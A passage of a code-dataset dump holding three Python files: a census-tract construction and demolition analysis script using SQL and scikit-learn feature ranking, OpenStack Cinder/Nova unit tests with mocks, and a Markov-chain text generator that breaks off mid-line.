pct_50to66, \"\n \"pct_67up, hsng_density, pct_comm, age_comm, \"\n \"pct_dev, pct_vac, park_dist, park_pcap, gwy_sqmi, \"\n \"age_bldg, mdnhprice,mdngrrent, pct_afford, \"\n \"pct_hu_vcnt, affhsgreen, foreclose,pct_own, \"\n \"pct_rent, pct_mf, age_sf, mdn_yr_lived, \"\n \"strtsdw_pct, bic_index,\"\n \"b08303002 + b08303003 + b08303004 tt_less15,\"\n \"b08303005 + b08303006 + b08303007 tt_15to29,\"\n \"b08303008 + b08303009 + b08303010 + b08303011 \"\n \"+ 
b08303012 + b08303013 tt30more,\"\n \"b08301002 tm_caralone, b08301010 tm_transit, \"\n \"b08301018 tm_bicycle, b08301019 tm_walk, mmcnxpsmi, \"\n \"transit_access, bic_sqmi, rider_sqmi, vmt_per_hh_ami, \"\n \"walkscore, autos_per_hh_ami, pct_canopy, \"\n \"green_bldgs_sqmi, pct_chgprop, avg_hours, \"\n \"emp_ovrll_ndx, pct_labor_force, emp_ndx, pct_unemp, \"\n \"pct_commercial, pct_arts, pct_health, pct_other, \"\n \"pct_pubadmin, pct_util, pct_mining, pct_ag, \"\n \"pct_food, pct_retail, pct_wholesale, pct_manuf, \"\n \"pct_construction, pct_waste_mgmt, pct_ed, pct_info, \"\n \"pct_transport, pct_finance, pct_realestate, \"\n \"pct_prof_services, pct_mgmt,pct_lowinc_job, \"\n \"pct_b15003016 pct_no_dip, pct_b15003017 pct_dip, \"\n \"pct_b15003018 pct_ged, pct_b15003019 pct_uni_1yr, \"\n \"pct_b15003020 pct_uni_no_deg, pct_b15003021 pct_assoc, \"\n \"pct_b15003022 pct_bach, pct_b15003023 pct_mast, \"\n \"pct_b15003024 pct_prof_deg, pct_b15003025 pct_phd, \"\n \"elem_dist, middle_dist, high_dist, \"\n \"pvt_dist, chldcntr_dist, cmgrdn_dist, frmrmkt_dist, \"\n \"library_dist, commcenter_dist,pct_medicaid, \"\n \"bpinc_pcap, hosp_dist, pol_dist, fire_dist, \"\n \"os_sqmi, pct_imp, wetland_sqmi, brnfld_sqmi, \"\n \"mata_route_sqmi, mata_stop_sqmi \"\n \"from (select count(s.fid) ninter, t.wkb_geometry, geoid10 \"\n \"from tiger_tract_2010 t, streets_carto_intersections s \"\n \"where st_intersects(s.wkb_geometry, t.wkb_geometry) \"\n \"group by geoid10, t.wkb_geometry) bg, \"\n \"(select geoid10, \"\n \"count(distinct case when const_type = 'new' \"\n \"then permit end) numpermit, \"\n \"count(distinct case when const_type = 'demo' \"\n \"then permit end) numdemo \"\n \"from permits p, tiger_tract_2010 t \"\n \"where st_within(p.wkb_geometry, t.wkb_geometry) \"\n \"group by t.geoid10) p, \"\n \"wwl_2017_tract w \"\n \"where w.geoid10 = bg.geoid10 \"\n \"and w.geoid10 = p.geoid10;\") \n\n@click.group()\ndef main():\n pass\n\n@main.command()\ndef corr_matrix():\n \"\"\"Create correlation matrix and generate heatmap\n\n \"\"\"\n from string import ascii_letters\n import numpy as np\n import pandas as pd\n import seaborn as sns\n import matplotlib.pyplot as plt\n\n X = df[x_vars]\n sns.set(style=\"white\")\n\n # Compute the correlation matrix\n corr = X.corr()\n\n # Generate a mask for the upper triangle\n mask = np.zeros_like(corr, dtype=np.bool)\n mask[np.triu_indices_from(mask)] = True\n\n # Set up the matplotlib figure\n f, ax = plt.subplots(figsize=(22, 18))\n\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n # Draw the heatmap with the mask and correct aspect ratio\n sns.heatmap(corr, mask=mask, cmap=cmap, center=0,\n square=True, linewidths=.5, cbar_kws={\"shrink\": .5}\n ,xticklabels=True, yticklabels=True\n ) \n ax.set_xticklabels(corr.index, fontsize=6)\n ax.set_yticklabels(corr.index, fontsize=6)\n plt.tight_layout()\n plt.savefig(out_dir+\"/figs/corr_matrix.png\")\n\n@main.command()\n@click.option(\"--coeff\", \"-c\", default=.8)\n@click.option(\"--update/--no-update\", default=True)\ndef get_correlated_features(coeff, update):\n \"\"\"Identify which features have highest correlation coefficient. 
The method\n returns a list of column names that should be excluded from an analysis,\n but also updates a table in the project database\n\n Args:\n coeff (float): threshold to identify values that should be removed\n\n \"\"\"\n corr = df[x_vars].corr()\n #correlates = set()\n correlates = list()\n for col_idx in range(len(corr.columns)):\n for row_idx in range(col_idx):\n corr_coeff = corr.iloc[col_idx, row_idx]\n if abs(corr_coeff) > coeff:\n d = {\"variable\": corr.columns[col_idx],\n \"corr_variable\": corr.index[row_idx],\n \"corr_coeff\": corr_coeff}\n correlates.append(d)\n df_corr = pd.read_json(json.dumps(correlates), orient=\"records\")\n if update:\n df_corr.to_sql(\"correlation_values\", con=engine, if_exists=\"replace\", \n index=False)\n return df_corr.variable.to_list()\n\ndef correlated_feature_list(coeff=.8):\n try:\n df_corr = pd.read_sql(\"select * from correlation_values\", engine)\n return df_corr.variable.to_list()\n except:\n corr_feats = get_correlated_features(coeff, False)\n return corr_feats\n\n@main.command()\n@click.option(\"--yname\", default=\"net\")\n@click.option(\"--n_features\", \"-nf\", default=1)\n@click.option(\"--plot/--no-plot\", default=False)\n@click.option(\"--coeff\", \"-c\", default=.8)\ndef create_feature_scores(yname, n_features, plot, coeff):\n \"\"\"Select most important features using recursive feature elimination (RFE)\n in conjunction with random forest regression and then plot the accuracy\n of the fit.\n\n References:\n\n Title: Feature Ranking RFE, Random Forest, Linear Models\n Author: Arthur Tok\n Date: June 18, 2018\n Code version: 80\n Availability: https://bit.ly/37ngDg8\n\n Title: Selecting good features – Part IV: stability selection, RFE and everything side by side\n Author: Ando Saabas\n Date: December 20, 2014\n Availability: https://bit.ly/2SGCuLx\n\n\n \"\"\"\n from sklearn.preprocessing import MinMaxScaler\n from sklearn.linear_model import LinearRegression, Ridge, Lasso\n from sklearn.ensemble import RandomForestRegressor \n from sklearn.feature_selection import RFE\n\n corr_features = correlated_feature_list(coeff)\n X = df[[col for col in x_vars if col not in corr_features]]\n cols = X.columns\n feature_rank = {}\n y = df[yname]\n accuracy = []\n\n def rank_features(ranks, names, order=1):\n minmax = MinMaxScaler()\n feature_rank = minmax.fit_transform(order*np.array([ranks]).T).T[0]\n feature_rank = map(lambda x: round(x,2), feature_rank)\n return dict(zip(names, feature_rank))\n\n #********************* Recursive Feature Elimination *********** \n #RFE with Linear Regression\n lr = LinearRegression(normalize=True)\n lr.fit(X,y)\n rfe = RFE(lr, n_features_to_select=n_features, verbose=3)\n rfe.fit(X,y)\n feature_rank[\"rfe-lr\"] = rank_features(list(map(float, rfe.ranking_)), cols,\n order=-1)\n accuracy.append([\"rfe-lr\", rfe.score(X,y)]) \n\n \n #RFE with Random Forest Regression\n rfr = RandomForestRegressor(max_features=\"sqrt\", random_state=RANDOM_STATE)\n rfr.fit(X,y)\n rfe = RFE(rfr, n_features_to_select=n_features, verbose=3)\n rfe.fit(X,y)\n feature_rank[\"rfe-rfr\"] = rank_features(list(map(float, rfe.ranking_)), cols,\n order=-1)\n accuracy.append([\"rfe-rfr\", rfe.score(X,y)])\n\n #************************* Regression *****************************\n #Linear Regression alone\n lr = LinearRegression(normalize=True)\n lr.fit(X,y)\n feature_rank[\"lr\"] = rank_features(np.abs(lr.coef_), cols)\n #Ridge Regression\n ridge = Ridge(alpha=7)\n ridge.fit(X,y)\n feature_rank[\"ridge\"] = 
rank_features(np.abs(ridge.coef_), cols)\n accuracy.append([\"ridge\", ridge.score(X,y)])\n\n #Lasso\n lasso = Lasso(alpha=.05)\n lasso.fit(X,y)\n feature_rank[\"lasso\"] = rank_features(np.abs(lasso.coef_), cols)\n accuracy.append([\"lasso\", lasso.score(X,y)])\n\n #Random Forest Regression alone\n rfr = RandomForestRegressor(max_features=\"sqrt\", random_state=RANDOM_STATE)\n rfr.fit(X,y)\n feature_rank[\"rfr\"] = rank_features(rfr.feature_importances_, cols)\n accuracy.append([\"rfr\", rfr.score(X,y)])\n\n r = {}\n for col in cols:\n r[col] = round(np.mean([feature_rank[method][col] \n for method in feature_rank.keys()]),2)\n methods = sorted(feature_rank.keys())\n feature_rank[\"mean\"] = r\n df_feature_rank = pd.DataFrame.from_dict(feature_rank)\n df_feature_rank.to_sql(\"feature_rank_{}\".format(yname),engine,\n if_exists='replace')\n sort_feat_rank = df_feature_rank.sort_values(\"mean\", ascending=False)\n sort_feat_rank[\"colnames\"] = sort_feat_rank.index\n #plot feature rankings\n if plot:\n f, ax = plt.subplots(figsize=(34,22))\n f = sns.barplot(x=\"mean\", y=\"colnames\", data=sort_feat_rank,\n palette=\"coolwarm\")\n f.set_yticklabels(sort_feat_rank.index, fontsize=10)\n f.set_xlabel(\"Mean Feature Importance\")\n f.set_ylabel(\"Column Name\")\n f.figure.tight_layout(pad=6.)\n# f.fig.suptitle(\"Mean Feature Importance for {}\".format(yname))\n plt.savefig(out_dir+\"/figs/bar_feat_ranking_{}_horizontal.png\".format(yname))\n return accuracy\n\n@main.command()\n@click.option(\"--coeff\", \"-c\", default=.8)\n@click.option(\"--plot/--no-plot\", default=True)\n@click.option(\"--yname\", default=\"net\")\n@click.option(\"--n-features\", \"-nf\", default=1)\n@click.option(\"--feature-score\", \"-fc\", default=0.)\ndef update_all(coeff, yname, n_features, feature_score, plot):\n \"\"\"Update `correlation_values` and `feature_rank` tables and generate new\n plots for rfr_accuracy, bar_feat_ranking \n \"\"\"\n get_correlated_features(coeff, plot)\n create_feature_scores(yname, n_features, True, coeff) \n plot_estimates(plot, feature_score, yname)\n\ndef select_features(yname=\"net\", index_only=False, min_score=.0):\n \"\"\"Select the feature rank table (feature_rank_) from postgres\n\n Args:\n yname (str): the suffix for which postgres table should be selected. \n Accepted values are net, scale_const, or scale_demo. Defaults to 'net'\n index_only (bool): False if only the index column containing the column\n names should be returned, True if all columns from the table should\n be returned. 
Defaults to False\n min_score (float): the minimum mean importance score that should be returned.\n Defaults to .0 for all values.\n \n Returns:\n\n \"\"\"\n cols = \"index\" if index_only else \"*\"\n params = {\"yname\": yname, \"cols\": cols, \"mean\": min_score}\n sql = \"select {cols} from feature_rank_{yname} where mean >= {mean}\"\n df = pd.read_sql(sql.format(**params), engine)\n return df\n\n@main.command()\n@click.option(\"-y\", default=\"net\")\n@click.option(\"--all\", \"-a\", is_flag=True)\ndef scatter_plot(y, all):\n \"\"\"Generates scatter plot matrix for all predictor variables against a y-value\n such as net construction, total construction or toal demolition.\n\n Args:\n y (str): column name to be used for dependent variable\n all (bool): True if all features should be included, False if correlated\n variables should be excluded\n Returns:\n None\n \"\"\"\n if not all:\n corr_cols = correlated_feature_list()\n cols = sorted([col for col in x_vars if col not in corr_cols])\n else:\n cols = sorted([col for col in x_vars])\n nrows, ncols = 9,14#14,9#10,12\n widths = [1 for col in range(ncols)]\n heights = [1 for row in range(nrows)]\n gridspec_dict={\"width_ratios\":widths,\n \"height_ratios\": heights}\n f, axes = plt.subplots(nrows, ncols, sharex=False, sharey=True,\n tight_layout=True, figsize=(34,22), \n gridspec_kw=gridspec_dict\n )\n var_pos = 0\n def plot(var_pos, row, col):\n #if y-value is for net construction, add two plots, one for net-poitive\n #construction, the other for net negative\n aspect = \"auto\"\n if y == \"net\":\n df[df.net < 0].plot.scatter(x=cols[var_pos], y=y, marker=\"<\",\n ax=axes[row,col],color=\"Purple\")\n axes[row,col].set_aspect(aspect)\n df[df.net >= 0].plot.scatter(x=cols[var_pos], y=y, marker=\">\",\n ax=axes[row,col], color=\"Green\") \n axes[row,col].set_aspect(aspect)\n else:\n color = lambda x: \"Green\" if \"const\" in x else \"Purple\"\n df.plot.scatter(x=cols[var_pos], y=y, marker=\">\",\n ax=axes[row,col], color=color(y))\n axes[row,col].set_aspect(aspect)\n for row in range(nrows):\n for col in range(ncols):\n if var_pos < len(cols):\n plot(var_pos, row, col)\n var_pos += 1\n plt.savefig(out_dir+\"/figs/scatter_plot_all_feats_{}.png\".format(y))\n plt.close()\n\ndef scatter_plot_single(y, x_label, filter_val=None):\n if filter_val:\n new_df = df[df[x_label] <= filter_val]\n else:\n new_df = df.copy()\n colors = lambda x: \"Purple\" if x < 0 or \"demo\" in y.lower() else \"Green\"\n new_df[\"color\"] = new_df[y].apply(colors)\n new_df.plot.scatter(x=x_label, y=y, color=new_df.color, s=8)\n plt.savefig(fig_home + \"/scatter_plot_{0}_{1}.png\".format(y,x_label))\n plt.close()\n\n@main.command()\n@click.option(\"--plot/--no-plot\", default=False)\n@click.option(\"--feat_score\", \"-fs\", default=.25)\n@click.option(\"--yname\", \"-y\", default=\"net\")\ndef plot_estimates(plot, feat_score, yname):\n \"\"\"Generate plots comparing different different numbers of estimators to\n determine the number to use for final model\n\n \"\"\"\n\n features = select_features(index_only=True, min_score=feat_score, yname=yname)\n #determinte number of trees in forest\n ensemble_clfs = [\n (\"RFR, max_features='sqrt'|red|-\",\n RandomForestRegressor(warm_start=True, oob_score=True,\n max_features=\"sqrt\",\n random_state=RANDOM_STATE\n )),\n (\"RFR, max_features='log2'|green|-\",\n RandomForestRegressor(warm_start=True, max_features='log2',\n oob_score=True,\n random_state=RANDOM_STATE\n )),\n (\"RFR, max_features=None|blue|-\",\n 
RandomForestRegressor(warm_start=True, max_features=None,\n oob_score=True,\n random_state=RANDOM_STATE\n ))]\n error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)\n\n min_estimators = 15\n max_estimators = 500\n X = df[features[\"index\"]]\n y_net = df[yname]\n for label, clf in ensemble_clfs:\n for i in range(min_estimators, max_estimators + 1):\n clf.set_params(n_estimators=i)\n clf.fit(X, y_net)\n # Record the OOB error for each `n_estimators=i` setting.\n oob_error = 1 - clf.oob_score_\n error_rate[label].append((i, oob_error))\n\n # Generate the \"OOB error rate\" vs. \"n_estimators\" plot.\n for label, clf_err in error_rate.items():\n xs, ys = zip(*clf_err)\n label, color, linestyle = label.split('|')\n plt.plot(xs, ys, label=label, color=color,\n linestyle=linestyle)\n\n if plot:\n plt.xlim(min_estimators, max_estimators)\n plt.xlabel(\"n_estimators\")\n plt.ylabel(\"OOB error rate\")\n #plt.legend(bbox_to_anchor=(0, 1.1, 1., .102), loc=\"upper center\", ncol=2)\n plt.legend(ncol=2)\n title = (\"Estimator at Feature Mean of {0} with {1} Features\\n\"\n \"for Column '{2}'\")\n plt.title(title.format(feat_score, features.shape[0], yname), pad=10)\n plt.tight_layout()\n min_score_format = int(feat_score*100)\n plt.savefig(out_dir+\"/figs/rfr_accuracy_{0}_{1}_new.png\".format(yname,min_score_format))\n plt.close()\n\ndef add_features(data, id_name):\n\n #helper method to lookup correct postgres datatype\n def dtype_lookup(column_name):\n pd_type = data[column_name].dtype.name\n dict_dtype = {\"object\":\"text\",\n \"float64\": \"float\",\n \"int64\": \"integer\"}\n return dict_dtype[pd_type]\n with engine.begin() as cnx:\n for col in [c for c in data.columns if c != id_name]:\n #add column to `all_features` if it doesn't already exist\n data_type = dtype_lookup(col)\n sql_create = (\"alter table all_features \" \n \"add column if not exists {0} {1}\"\n )\n cnx.execute(sql_create.format(col, data_type))\n #update current column in all_features with new values\n update_vals = {\"column\": col, \"id_name\": id_name}\n val_id = list(zip(data[col], data[id_name]))\n update_vals[\"values\"] = \",\".join(\"({0}, '{1}')\".format(*i) \n for i in val_id)\n sql = (\"update all_features a set {column} = n.{column} \"\n \"from (values {values}) as n ({column}, {id_name}) \"\n \"where n.{id_name} = a.{id_name}\"\n )\n cnx.execute(sql.format(**update_vals))\n\ndef more_parcels():\n\n sql = (\"with par as ( \"\n \"select wkb_geometry, parcelid, st_area(p.wkb_geometry)/43560 par_acre, \" \n \"sfcom, sfla, rmtot, res_par_perim, livunit \" \n \"from built_env.sca_shelby_parcels_2017 p \"\n \"full join (select parid, sum(sf) sfcom from \" \n \"built_env.sca_comintext group by parid) c \"\n \"on c.parid = parcelid \" \n \"full join (select parid, sum(sfla) sfla, sum(rmtot) rmtot \" \n \"from built_env.sca_dweldat group by parid) d \"\n \"on d.parid = parcelid \"\n \"full join \"\n \"(select parid, livunit, \"\n \"case when luc = '062' then st_perimeter(wkb_geometry) \"\n \"else 0 end res_par_perim \"\n \"from built_env.sca_pardat, built_env.sca_shelby_parcels_2017 \"\n \"where parcelid = parid) pa \"\n \"on pa.parid = parcelid) \"\n \"select geoid10, par_acre, sfcom, sfla, rmtot, res_par_perim, livunit \"\n \"from par, tiger_tract_2010 t \"\n \"where st_intersects(st_centroid(par.wkb_geometry), t.wkb_geometry) \"\n )\n df = pd.read_sql(sql, engine)\n df.fillna(0, inplace=True)\n grp = df.groupby(\"geoid10\").median()\n grp.reset_index(inplace=True)\n add_features(grp, \"geoid10\")\n\ndef 
simpson_diversity():\n \"\"\"Calculates a diversity index using Simpson's diversity index as represented\n by the formula:\n\n D = 1 - (sum(n(n-1))/N(N-1))\n where n is a total for a particular land use and N is the total land uses for\n a given geography.\n \"\"\"\n sql = (\"select luc, count(luc) ct_luc, geoid10 from built_env.sca_pardat, \"\n \"built_env.sca_shelby_parcels_2017 p, tiger_tract_2010 t \"\n \"where parid = parcelid and st_intersects(st_centroid(p.wkb_geometry), \"\n \"t.wkb_geometry) \"\n \"group by luc, geoid10\"\n )\n\n df = pd.read_sql(sql, engine)\n #calculate n\n sp_count = lambda n: n * (n -1)\n df[\"ind_count\"] = df.ct_luc.apply(sp_count)\n #calculate the diversity score, D, for all geographies\n def diversity_index(ind_count, all_count):\n return 1 - (sum(ind_count) / (sum(all_count)*(sum(all_count)-1)))\n div_score = pd.DataFrame(df.groupby(\"geoid10\").apply(\n lambda x: diversity_index(x[\"ind_count\"], x[\"ct_luc\"])))\n div_score.reset_index(inplace=True)\n div_score.rename(columns={0:\"div_idx\"}, inplace=True)\n add_features(div_score, \"geoid10\")\n\ndef parse_raster():\n \"\"\"Steps taken to create data:\n 1. Raster representation of land uses was created using gdal_rasterize in \n QGIS using a cell size of 30 map units (feet). \n 2. Tract table was split into individual shapefiles based on geoid using\n Split vector layer tool in QGIS\n 3. Split census tract shapefiles were used to split Raster created in \n step 1 into individual rasters using gdal_wrap tool within shell \n script\n TODO: \n - automate rasterization using gdal_rasterize with postgresql layer\n \n \"\"\"\n import pylandstats as pls\n \n raster_dir = \"/home/natron/temp/split_raster\"\n\n land_metrics = [\"number_of_patches\", \"patch_density\", \"largest_patch_index\",\n \"total_edge\", \"edge_density\", \"landscape_shape_index\",\n \"contagion\", \"shannon_diversity_index\"]\n all_geoids = []\n for img in os.listdir(raster_dir):\n geoid = img[8:-4]\n land = pls.Landscape(os.path.join(raster_dir, img))\n land_stats = land.compute_landscape_metrics_df()\n ls_dict = land_stats[land_metrics].to_dict(\"records\")[0]\n ls_dict[\"geoid10\"] = geoid\n all_geoids.append(ls_dict)\n df = pd.DataFrame(all_geoids)\n add_features(df, \"geoid10\")\n\ndef low_dimensional_plot():\n y = df[\"net\"]\n x = df[x_vars]\n perplex = 5\n nrows, ncols = 5,5\n idx = 1\n for row in range(nrows):\n for col in range(ncols):\n x_fit = TSNE(n_components=2, perplexity=perplex).fit_transform(x)\n # each perplexity panel gets its own axes (pyplot.subplot takes no sharex/sharey flags)\n plt.subplot(nrows, ncols, idx)\n plt.scatter(x_fit[:,0], x_fit[:,1], c=y, cmap=plt.get_cmap(\"PRGn\"))\n plt.title(\"Perplexity: {}\".format(perplex))\n perplex += 5\n idx += 1\n\ndef compare_city_owned():\n \"\"\"\n By permit name:\n 0.03% city-led construction\n 96.5% city-led demolition\n By city-owned property\n 0.6 % difference in construction\n 0.2% difference in demolition \n \"\"\"\n q = (\"select * \"\n \"from (select geoid10, \"\n \"count(distinct case when const_type = 'new' then permit end) numpermit,\"\n\t \"count(distinct case when const_type = 'demo' then permit end) numdemo \"\n \"from permits p, tiger_tract_2010 t \"\n \"where st_within(p.wkb_geometry, t.wkb_geometry) {}\"\n \"group by t.geoid10) q \"\n \"order by geoid10\"\n )\n\n omit = \" and lower(p.name) not similar to '%(city of|cizty of)%' \"\n df_all = pd.read_sql(text(q.format(\"\")), engine)\n df_limit = pd.read_sql(text(q.format(omit)), engine)\n q_zoning = (\"with p as (select wkb_geometry, \"\n\t\t \"lower(regexp_replace(zoning, 
'[^a-zA-Z0-9]', '', 'g')) zoning \"\n\t\t \"from built_env.sca_shelby_parcels_2017, built_env.sca_pardat \"\n\t\t \"where parcelid = parid) \"\n \"select geoid10, zoning, \"\n \"count(zoning) from tiger_tract_2010 t, p \"\n \"where st_intersects(st_centroid(p.wkb_geometry), t.wkb_geometry) \"\n \"group by geoid10, zoning\" \n )\n dfz = pd.read_sql(text(q_zoning), engine)\n dfz_pivot = dfz.pivot(index=\"geoid10\", columns=\"zoning\", values=\"count\")\n dfz_pivot.fillna(0., inplace=True)\n # dfz_pivot keeps geoid10 as its index, which join(on=\"geoid10\") aligns against\n df_all = df_all.join(dfz_pivot, on=\"geoid10\", how=\"left\")\n q_cityown = (\"with parcels as (select wkb_geometry \"\n\t \"from sca_owndat, built_env.sca_shelby_parcels_2017 pa \"\n \"where lower(concat(adrno,adrdir,adrstr,adrsuf)) <> '125nmainst' \"\n \"and parcelid=parid) \"\n \"select geoid10, \"\n \"count(distinct case when const_type = 'new' then permit end) numpermit, \"\n \"count(distinct case when const_type = 'demo' then permit end) numdemo \"\n \"from permits p, tiger_tract_2010 t, parcels \"\n \"where st_intersects(p.wkb_geometry, parcels.wkb_geometry) \"\n \"and st_intersects(p.wkb_geometry, t.wkb_geometry) \"\n \"group by geoid10\"\n )\n df_cityown = pd.read_sql(q_cityown, engine)\n# chars = \"[/\\/#/$/*///-/(/)/s]\"\n# dfz.zoning = dfz.zoning.str.replace(chars, \"\").str.lower() \n\n \n\nif __name__==\"__main__\":\n main()\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":27195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"429960689","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport unittest\n\nimport mock\nfrom cinder_task.actions import actions\nfrom cinder_task.common import clients\nfrom cinder_task.common import template\nfrom cinder_task.tests.unit import fake_data\n\n\nclass BaseTestCase(unittest.TestCase):\n \"\"\"Base test class.\"\"\"\n def setUp(self):\n self.cinder_actions = actions.CinderActions()\n self.nova_actions = actions.NovaActions()\n self.volume = fake_data.fake_volume(fake_data.VOLUME_DISPLAY_NAME,\n fake_data.VOLUME_SIZE)\n self.instance = fake_data.fake_instance(fake_data.INSTANCE_NAME,\n fake_data.FAKE_FLAVOR,\n fake_data.FAKE_IMG)\n self.fcc = fake_data.FakeCinderClient()\n self.fnc = fake_data.FakeNovaClient()\n\n\nclass TestCinderActions(BaseTestCase):\n \"\"\"Test cinder actions.\"\"\"\n @mock.patch.object(clients, '_cinder_client')\n def test_create_volume(self, mock_cinder_client):\n mock_cinder_client.return_value = self.fcc\n volume = self.cinder_actions.create_volume(\n fake_data.VOLUME_SIZE, fake_data.VOLUME_DISPLAY_NAME)\n self.assertEqual(fake_data.FakeVolumes.volume, volume)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n\n @mock.patch.object(clients, '_cinder_client')\n def test_list_volumes(self, mock_cinder_client):\n mock_cinder_client.return_value = self.fcc\n volumes = self.cinder_actions.list_volumes()\n self.assertEqual(len(volumes), 1)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n\n @mock.patch.object(clients, '_cinder_client')\n def test_get_volume_by_its_name_or_id(self, mock_cinder_client):\n mock_cinder_client.return_value = self.fcc\n volume = self.cinder_actions.show_volume(\n fake_data.VOLUME_DISPLAY_NAME)\n self.assertEqual(fake_data.FakeVolumes.volume, volume)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n\n\nclass TestNovaActions(BaseTestCase):\n \"\"\"Test nova actions.\"\"\"\n @mock.patch.object(clients, '_nova_client')\n def test_boot_instance(self, mock_nova_client):\n mock_nova_client.return_value = self.fnc\n instance = self.nova_actions.boot_instance('fake', 'fake_flavor',\n 'fake_image')\n self.assertEqual(self.instance, instance)\n self.assertEqual(len(mock_nova_client.mock_calls), 1)\n\n @mock.patch.object(template.UserdataTemplate, 'get_userdata')\n @mock.patch.object(clients, '_nova_client')\n @mock.patch.object(clients, '_cinder_client')\n def test_boot_instance_with_volume(self, mock_cinder_client,\n mock_nova_client, mock_get_userdata):\n mock_cinder_client.return_value = self.fcc\n mock_nova_client.return_value = self.fnc\n mock_get_userdata.return_value = 'fake_userdata'\n instance = self.nova_actions.boot_instance('fake', 'fake_flavor',\n 'fake_image',\n 'fake_volume_id')\n self.assertEqual(self.instance, instance)\n self.assertEqual(len(mock_cinder_client.mock_calls), 1)\n self.assertEqual(len(mock_nova_client.mock_calls), 1)\n self.assertEqual(len(mock_get_userdata.mock_calls), 1)\n\n @mock.patch.object(clients, '_nova_client')\n def test_list_instances(self, mock_nova_client):\n mock_nova_client.return_value = self.fnc\n instances = self.nova_actions.list()\n self.assertEqual(len(instances), 1)\n self.assertEqual(len(mock_nova_client.mock_calls), 1)\n\n @mock.patch.object(clients, '_nova_client')\n def test_get_instance(self, mock_nova_client):\n mock_nova_client.return_value = self.fnc\n instance = self.nova_actions.get_instance('fake_uuid')\n self.assertEqual(self.instance, instance)\n self.assertEqual(len(mock_nova_client.mock_calls), 
1)\n","sub_path":"cinder_task/tests/unit/test_actions.py","file_name":"test_actions.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"402676566","text":"import os\nimport json\nimport time\nimport sys\nfrom collections import OrderedDict, defaultdict, Counter\nfrom PyDictionary import PyDictionary\nimport numpy as np\n\n# Example test files\n# https://www.gutenberg.org/ebooks/11 - Alice's Adventures in Wonderland by Lewis Carroll\n# https://www.gutenberg.org/ebooks/1342 - Pride and Prejudice by Jane Austen\n\n# dict to store words and transitions\nd = defaultdict(list)\n# dict to store frequency of occurrences of word transitions\ne = defaultdict(list)\nstart_key = 'The'\n\ndef read_training_files( ):\n global d, e\n\n ret_val = ''\n train_file = input(\">> Enter path to training file ('.' or blank to end) : \")\n while train_file != '.' and train_file != '':\n with open( train_file ) as f:\n print(\">> Processing\", train_file, \"...\")\n book = f.read()\n\n words = book.split()\n # record every word -> next-word transition\n for i in range(0, len(words)-1):\n d[words[i]].append(words[i+1])\n\n # create frequency of occurrences of the transition to a certain word\n e = { k: OrderedDict(Counter(d[k]).most_common()) for k in d.keys() }\n ret_val = train_file\n print(\"done\")\n\n train_file = input(\">> Enter path to training file ('.' or blank to end) : \")\n\n return ret_val\n\ndef markov_write_story( nwords=250, nkey='The', prob=False ):\n num_words = nwords\n while num_words:\n print(nkey+' ', end='')\n p = None\n num_words -= 1\n if prob:\n # create list of probabilities of transitions for the next word\n p = np.array(list(e[nkey].values()))/sum(list(e[nkey].values()))\n # advance the chain on every iteration, weighted or uniform\n nkey = np.random.choice(list(e[nkey]), p=p)\n if num_words <= 25:\n if nkey.endswith('.'):\n # time to end the story\n print(nkey)\n break\n\ndef markov_get_line( nkey='The' , prob=False, ctxt='' ):\n ''' Return a sentence using 1-order markov chaining '''\n global start_key\n skipped = False\n sentence = ''\n p = None\n\n end_chars = (('.', '?', '!'))\n\n while nkey.endswith(end_chars) == False or nkey.startswith(('\"', \"'\")):\n if nkey.startswith(('\"')) == True:\n sentence = sentence.ljust(len(sentence) + 1) + nkey \n # loop till we find a end-quote\n skipped = False\n while nkey.endswith(('\"', '.\"', ',\"')) == False:\n if skipped == False:\n nkey = np.random.choice(list(e[nkey]))\n else:\n skipped = False\n if nkey.endswith((\"'\")) or nkey.startswith((\"'\", '\"')):\n nkey = np.random.choice(list(e[nkey]))\n skipped = True\n continue\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n nkey = np.random.choice(list(e[nkey])) \n elif nkey.startswith((\"'\")) == True:\n sentence = sentence.ljust(len(sentence) + 1) + nkey \n skipped = False\n while nkey.endswith((\"'\", \".'\", \",'\")) == False:\n if skipped == False:\n nkey = np.random.choice(list(e[nkey]))\n else:\n skipped = False\n if nkey.endswith( ('\"') ) or nkey.startswith( ('\"',\"'\") ):\n nkey = np.random.choice(list(e[nkey]))\n skipped = True\n continue\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n nkey = np.random.choice(list(e[nkey]))\n elif nkey.endswith(('\"', \"'\")) == True:\n nkey = np.random.choice(list(e[nkey]))\n else:\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n nkey = np.random.choice(list(e[nkey]))\n\n sentence = sentence.ljust(len(sentence) + 1) + nkey\n start_key = np.random.choice(list(e[nkey]))\n return sentence\n\nif __name__=='__main__':\n\n dix = PyDictionary()\n if 
